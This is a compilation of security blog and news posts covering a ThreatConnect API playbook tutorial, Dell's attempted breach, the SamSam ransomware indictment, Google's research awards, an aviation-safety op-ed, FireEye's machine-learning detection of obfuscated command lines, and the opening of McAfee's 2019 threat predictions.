ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

What?

This week, we are featuring a Playbook Component which finds the rank of a given host in a list of the one million, most visited hostnames. In this post, we are going to introduce why this component is useful, discuss why it is a Playbook Component rather than a Playbook, and show you how to use this component (if you have Playbooks enabled in your ThreatConnect instance, you can create a Playbook to use this component in less than five minutes).

Why?

If a Host Indicator is one of the top million, most visited domains, this usually merits further investigation. It could be that a host in the list is benign (perhaps it is a false positive or perhaps a malware sample calls back to a benign host to test its internet connection or get its IP address). It could alternatively mean that the host is malicious and simply getting a lot of traffic. Either way, it’s helpful to have this information. This Playbook Component, built on the OneMillion API (which is not maintained by ThreatConnect), allows incident responders and analysts to check if a given domain exists on any lists of the most frequently visited hostnames.

Why a component?

Before we talk about how to use this component, let’s address why this system was created as a Playbook Component rather than normal Playbook. The major benefit of components is that you can capture a common process you would like to repeat in multiple, diverse places. For example, if you are making a Playbook which requires you to get the length of a string, you could add apps to get the length of a string to that Playbook, but if you ever need to get the length of a string again, you will have to recreate what you have already done. Instead, if you are creating a generic function or one that you would like to use in multiple playbooks, consider creating a component. A component lets you perform an operation again and again without having to recreate anything (and by the way, there is a component to get the length of a string described here (this site is not maintained by ThreatConnect)). In the case of the OneMillion API Component, it was created as a component so that it is easy to plug into new and existing playbooks.

Using the component

So how do you use this component? In this section, we’ll walk through the installation of the component and will create a Playbook to use the component to show you how easy it is to use components to expand the functionality of a Playbook.

  1. The first step is to install the component. You can download it from https://tc.hightower.space/post/playbook-components/onemillion-api-query/ (which is not maintained by ThreatConnect) or download the “Query OneMillion API.pbx” file from GitHub.
  2. Once you have downloaded the component, you can import it into ThreatConnect like a Playbook by going to the “Playbooks” tab in ThreatConnect and clicking “New” > “Import” (on ThreatConnect versions before 5.7, you can click the “Import” button). Then import the Query OneMillion API.pbx file.
  3. Turn it on and the component is ready to be used!
  4. Now that we have installed and activated the “Query OneMillion API” component, we need to create a Playbook to use it. To do this, go back to the “Playbooks” tab in ThreatConnect and create a new Playbook. For this example, we are going to create a Playbook with a User Action trigger that will allow users to submit a host indicator in ThreatConnect to the OneMillion API and return the result with a single click.
  5. To build this Playbook, select the “Trigger” tab in the pane on the left and select “UserAction”. This will add the trigger to the design canvas. Now, double click on the new trigger to edit it. Rename the trigger in the “User Action Name” field (this name will show up for users when viewing Host indicators in ThreatConnect). Select “Host” for the “Type” field, click through the next section, and save the trigger.
  6. Now, click the “App” tab in the pane on the left and select the “Query OneMillion API” from the “Components” section. If it does not show up, this is probably the “Query OneMillion API” component you installed in step two is not turned on (as we did in step three). Assuming, you were able to find the “Query OneMillion API” component and add it to the design canvas, drag a line from the blue dot on the trigger to the component. Double click on the component to edit it. In the “Host” field, start typing “#” and a list of available options will show up. Select “trg.action.item” (this is the hostname which is captured by the User Action trigger); this means that the hostname from which the Playbook was triggered will be sent to the OneMillion API (if this doesn’t make sense, watch the gif above for a demo that will clarify how this system works). Save the “Query OneMillion API” component.
  7. Now, draw a line between the blue dot on the “Query OneMillion API” component and the trigger. This allows us to send information back to the user via the trigger. Double click on the trigger to edit it. Click “Next” to move to the second stage (you should see a text area with the label “Body”). In the text area, start typing “#” (again, this shows you a list of available values you can send back to the user). Select “hostRank” and save the trigger.
  8. Turn the Playbook on by clicking the “Active” toggle in the upper right-hand corner.
  9. Now for the fun part: using the Playbook! Find or create a host indicator in your ThreatConnect instance. There should be a “Playbook Actions” card on the top-right side of the indicator’s page and it should list the name of the User Action trigger you provided in step five (if you didn’t change the name of the User Action trigger, it will probably show up as “UserAction Trigger 1“). When you click it, the Playbook will be executed and the rank of the host (if there is one) will be returned to the right of the trigger. You now have a Playbook which lets analysts query the OneMillion API!

If you have completed the steps above and would like to contribute your playbook with the trigger in it, there are instructions for contributing to our playbooks repository here: https://github.com/ThreatConnect-Inc/threatconnect-playbooks/wiki/Contributions-Workflow .

If you have any questions or run into any problems with this playbook component, please raise an issue in Github. As always, let us know if you have any questions!

The post Playbook Fridays: OneMillion API Component appeared first on ThreatConnect | Intelligence-Driven Security Operations.

Hackers targeted Dell customer information in attempted attack

Earlier this month, hackers attempted to breach Dell's network and obtain customer information, according to the company. While it says there's no conclusive evidence the hackers were successful in their November 9th attack, it's still possible they obtained some data.

Via: The Verge

Source: Dell (1), (2)

Two Iranian Hackers charged with $6 Million in SamSam Ransomware Attacks

Today the Department of Justice announced an indictment against two Iranian men: Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri for their roles in stealing more than $6 Million in Ransom payments from a 34 month long ransomware campaign known as SamSam.

They were charged with:

18 U.S.C. § 371 - Conspiracy to Defraud the United States

18 U.S.C. § 1030(a)(5)(A) - knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;

18 U.S.C. § 1030(a)(7)(C) - demand or request for money or other thing of value in relation to damage to a protected computer, where such damage was caused to facilitate the extortion

18 U.S.C. § 1349 - Conspiracy

Victims were found in nearly every state:

Victim Locations from: https://www.justice.gov/opa/press-release/file/1114736/download


Piecing together the case involved gaining cooperation from two European VPN services, and apparently at least one search engine.   The indictment refers, for example, to the defendants using Bitcoin to pay for access to a European VPS, and then searching on May 15, 2016, for "kansasheart.com".  The same day, they accessed the public website of Kansas Heart Hospital, and on May 18th, encrypted many key computers on the network and sent their ransom note.

Another key part of the investigation was gaining the cooperation of a Bitcoin Exchanger, which was able to demonstrate that on July 21, 2016, the defendants cashed out at least some of their ransomed Bitcoin into Iranian Rials and deposited it into bank accounts controlled by MANSOURI and SAVANDI.

Chat logs were also available to the investigators, as the indictment mentions contents of chat consistently throughout their timeline.  Using the combination of events, some of the key dates were:

  • December 14, 2015 - Defendants chatting about the development and functionality of SamSam.
  • Jan 11, 2016 - Attack on Mercer County Business in New Jersey 
  • Feb 5, 2016 - Attack on Hollywood Presbyterian Medical Center 
  • March 27, 2016 - Attack on MedStar Health 
  • May 15, 2016 - Attack on Kansas Heart Hospital 
  • May 27, 2016 - Attack on University of Calgary 
  • July 27, 2016 - Attack on Nebraska Orthopedic Hospital 
  • April 25, 2017 - Attack on City of Newark, New Jersey 
  • January 18, 2018 - Attack on Allscripts Healthcare Solutions, Inc. 
  • February 19, 2018 - Attack on Colorado Department of Transportation 
  • March 22, 2018 - Attack on City of Atlanta, Georgia 
  • July 14, 2018 - Attack on LabCorp 
  • September 25, 2018 - Attack on the Port of San Diego 
FBI Wanted Poster from: https://www.justice.gov/opa/press-release/file/1114746/download

Breaking down Dell’s “potential cybersecurity incident” announcement

With numerous regulations and laws like the European Union’s General Data Protection Regulation putting pressure on enterprises to go public with cybersecurity incidents, we’ve seen a trend of businesses disclosing breaches first and filling in the details later.

Dell provided the latest example of this trend Wednesday, announcing a “potential cybersecurity incident” that it detected earlier in the month. But despite the disclosure, it’s unclear if Dell should be celebrating or preparing for class action lawsuits. Let’s take a closer look at Dell’s notification.

First, there’s the headline — “Dell Announces Potential Cybersecurity Incident” – which is somewhat confusing because according to Dell itself, there most definitely was an incident. The company says “it detected and disrupted unauthorized activity on its network attempting to extract Dell.com customer information, which was limited to names, email addresses and hashed passwords.” It sounds like Dell thinks there was a potential breach rather than a potential cybersecurity incident.

Regardless, Dell apparently stopped the intrusion before attackers could steal any data, which is good news. But Dell qualified that statement with this portion of the announcement: “Though it is possible some of this information was removed from Dell’s network, our investigations found no conclusive evidence that any was extracted.”

The absence of evidence, however, doesn’t mean the attackers were unsuccessful. We don’t have any idea how long Dell thinks the intrusion lasted – only that it detected the unauthorized activity on Nov. 9. But we do know that the threat actor or actors attempted to extract customer data, and that it was limited to just names, email addresses and hashed passwords – though we don’t know how they were hashed (hopefully not MD5 or a similarly weak algorithm, and hopefully securely salted).

On the positive side, Dell seemed fairly confident about the scope of the intrusion. “Credit card and other sensitive customer information was not targeted,” the company said in its notification. “The incident did not impact any Dell products or services.”

The company added that it had “implemented countermeasures,” including “the hashing of our customers’ passwords and a mandatory Dell.com password reset.” Password resets are standard operating procedure for any incident, so it’s hard to judge just how severe this potential cybersecurity incident is for Dell based on those reactions. It’s also unclear what Dell means by “hashing the customer passwords.” (Did they rehash them after they were reset? Did they hash them with something different this time around? Did they add salt?)

Nevertheless, it sounds like Dell has contained the issue. The company said it’s investigating the intrusion, hired a third-party firm to conduct a separate, independent investigation, and also engaged law enforcement.

Dell’s announcement raises an important question: is this a cybersecurity win for the company? Based on the information available, Dell was able to detect threat actors on its network and stop them before they successfully extracted any data. That sounds like a win.

However, there are a lot of unknowns that could dampen the positives. We don’t know for sure that no customer data was exfiltrated, we don’t know how long the intrusion lasted, and we don’t know how the threat actors gained the unauthorized access in the first place (if it was, for example, a website flaw that was disclosed a year earlier but never fixed, then that would be bad). The answers to those questions could significantly alter the narrative.

It’s likely we’ll hear more from Dell about this incident down the road. For now, we’ll be left to wonder whether Dell gets to the chalk this up as a win or if it’s yet another negative cybersecurity headline.

 

The post Breaking down Dell’s “potential cybersecurity incident” announcement appeared first on Security Bytes.

Searching for Cisco Umbrella Alternatives? Your Affordable Option for DNS Security with Advanced Reporting.

Looking for an affordable alternative to Cisco Umbrella Enterprise's high cost? ThreatSTOP comes with advanced reporting and security research tools out-of-the-box. See blocked threats, remediate client machines faster and check IOC’s. Here's a breakdown of how ThreatSTOP and Cisco line up.

Announcing the Google Security and Privacy Research Awards



We believe that cutting-edge research plays a key role in advancing the security and privacy of users across the Internet. While we do significant in-house research and engineering to protect users’ data, we maintain strong ties with academic institutions worldwide. We provide seed funding through faculty research grants, cloud credits to unlock new experiments, and foster active collaborations, including working with visiting scholars and research interns.

To accelerate the next generation of security and privacy breakthroughs, we recently created the Google Security and Privacy Research Awards program. These awards, selected via internal Google nominations and voting, recognize academic researchers who have made recent, significant contributions to the field.

We’ve been developing this program for several years. It began as a pilot when we awarded researchers for their work in 2016, and we expanded it more broadly for work from 2017. So far, we awarded $1 million dollars to 12 scholars. We are preparing the shortlist for 2018 nominees and will announce the winners next year. In the meantime, we wanted to highlight the previous award winners and the influence they’ve had on the field.
2017 Awardees

Lujo Bauer, Carnegie Mellon University
Research area: Password security and attacks against facial recognition

Dan Boneh, Stanford University
Research area: Enclave security and post-quantum cryptography

Aleksandra Korolova, University of Southern California
Research area: Differential privacy

Daniela Oliveira, University of Florida
Research area: Social engineering and phishing

Franziska Roesner, University of Washington
Research area: Usable security for augmented reality and at-risk populations

Matthew Smith, Universität Bonn
Research area: Usable security for developers


2016 Awardees

Michael Bailey, University of Illinois at Urbana-Champaign
Research area: Cloud and network security

Nicolas Christin, Carnegie Mellon University
Research area: Authentication and cybercrime

Damon McCoy, New York University
Research area: DDoS services and cybercrime

Stefan Savage, University of California San Diego
Research area: Network security and cybercrime

Marc Stevens, Centrum Wiskunde & Informatica
Research area: Cryptanalysis and lattice cryptography

Giovanni Vigna, University of California Santa Barbara
Research area: Malware detection and cybercrime


Congratulations to all of our award winners.

Will cybersecurity safety ever equal air travel safety?

Aviation safety provides an aspirational model of a safety success story when you consider that over the past 50 years, even as total passenger miles have exploded, commercial airline fatalities have plummeted.

The commercial aviation industry has an admirable safety record, but can the lessons learned over the past decades in that industry be extended to improve the state of cybersecurity safety? When it comes to the ongoing discussion about issues related to cybersecurity safety, some of the most respected names in the business have been making an important case that we need to do much better.

The improvements in aviation safety are inarguably worth it: as the number of passengers carried annually has increased by an order of magnitude, the average number of fatal airline accidents has plummeted: flying is now anywhere from 100 to 1,000 times safer than driving, depending on the evaluation criteria used.

Former Facebook CISO Alex Stamos tweeted in October: “It would be great to move InfoSec norms closer to aviation safety, where close-calls are disclosed in a standard, centralized manner and discussed rationally by experts who extract lessons from the mistakes of others,” adding “we currently don’t live in that world.”

In the world we inhabit, cybersecurity safety seems to be modeled more on automotive safety than aviation safety, and that’s the problem.

The U.S. National Highway Traffic Safety Administration reported that 37,461 died in traffic accidents in 2016; the same year, the Aviation Safety Network reported that 258 people died in commercial airline accidents. Unlike drivers, pilots must undergo extensive and ongoing training, must perform extensive system checks on their aircraft before leaving the hangar, and are held accountable for any incident that occurs while the aircraft is under their control.

Clearly, cybersecurity safety has a long way to go, still. As Kevin Beaumont, the U.K.-based security researcher, pointed out in November: “Usually it’s us, the IT bods, being idiots for building a system so fragile one employee can bring down by clicking the ‘wrong’ link. Imagine if planes were built so the passenger could bring down a plane by pressing a button at their seat.”

Under the current model, cybersecurity safety depends on the expectation that billions of end users will be knowledgeable about cyber threats and how to defend against them as well as being aware of the need for antimalware software and patching and staying up to date on security practices and generally taking the initiative to maintain cybersecurity hygiene while also reporting any cyber incidents.

Put another way, every connected device is covered with buttons, any one of which, if pressed at the wrong moment, could “bring down” not just that device, but any number of other connected devices.

Cybersecurity safety is still up in the air, so to speak, for many reasons starting with a lack of sensible regulations and agencies to investigate, share and learn from failures. But disastrous cybersecurity safety failures aren’t seen as harming the whole industry. Consider what Mikko Hypponen, chief research officer at F-Secure, tweeted this week about one magnificent, ongoing failure of security: “I can’t believe that we are *still* fighting Office macro malware now, 20 years later.”

Airlines have a vested interest in keeping air travel safe because if passengers fear for their lives many of them will stop paying to fly. Even if they don’t particularly want to be regulated, those airlines will still accept government safety regulation because safer skies means less losses from crashed planes as well as more passengers willing to pay to ride on safer planes.

The tech sector needs to step up and accept responsibility for cybersecurity safety in the same way the aviation industry did for air travel safety, and that will only begin when vendors are held to higher standards; when vendors, enterprises and government agencies can agree to investigate cyber incidents and focus on cooperation in using that information to improve cybersecurity safety; and when consumers and all end-users can be confident that they can use their devices and the internet safely — and without being victim-blamed when things do, inevitably, go wrong.

The post Will cybersecurity safety ever equal air travel safety? appeared first on Security Bytes.

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of Powershell and Windows command lines respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) have demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion “simple” means generally short and relatively uncomplicated, but can still contain obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produce many boundary cases where simple heuristics to detect if a script is obfuscated (e.g. length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is feasible yet impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as authors evolve to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighing scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated with a score of 19.7 percent (the complement of the measure of the classifier’s confidence in non-obfuscation). Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The number of misclassifications of the CNN model was also more than that of the Gradient Boosted Tree model. Both of these are most likely the result of inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate ML to take an increasingly important role both at FireEye and in the rest of the cyber security industry.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

 

Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the RigExploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. Minerva Labs discovered WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

